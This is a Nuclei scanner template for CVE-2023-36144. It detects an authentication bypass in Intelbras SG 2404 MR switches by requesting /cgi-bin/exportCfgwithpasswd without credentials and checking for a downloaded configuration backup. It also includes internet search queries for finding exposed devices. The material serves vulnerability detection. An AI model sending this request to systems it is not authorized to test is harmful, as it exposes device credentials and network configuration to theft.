id: CVE-2023-36144 info: name: Intelbras Switch - Information Disclosure author: gy741 severity: high description: | An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration. impact: | Unauthenticated attackers can exploit authentication bypass to download backup configuration files containing critical device information including credentials and network configuration from Intelbras Switch devices. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-36144 - https://github.com/leonardobg/CVE-2023-36144 - http://intelbras.com - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-36144 cwe-id: CWE-862 epss-score: 0.85474 epss-percentile: 0.99382 cpe: cpe:2.3:o:intelbras:sg_2404_mr_firmware:1.00.54:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelbras product: sg_2404_mr_firmware shodan-query: - title:"Intelbras" - http.title:"intelbras" fofa-query: title="intelbras" google-query: intitle:"intelbras" tags: cve2023,cve,intelbras,switch,exposure,vkev,vuln http: - method: GET path: - '{{BaseURL}}/cgi-bin/exportCfgwithpasswd' matchers-condition: and matchers: - type: word part: body words: - 'System Description' - 'System Version' - 'System Name' condition: and - type: word part: header words: - 'attachment;filename=' - type: status status: - 200 # digest: 4a0a00473045022055ecfad50d5db35c5e447136bffd258527afd6dc6eedee6aa2899382355e06fa022100f0bf95320f0e5cf7ae8e5befdc5215c9718ad27d84a569a84bfc987e8f0e340e:922c64590222798bb761d5b6d8e72950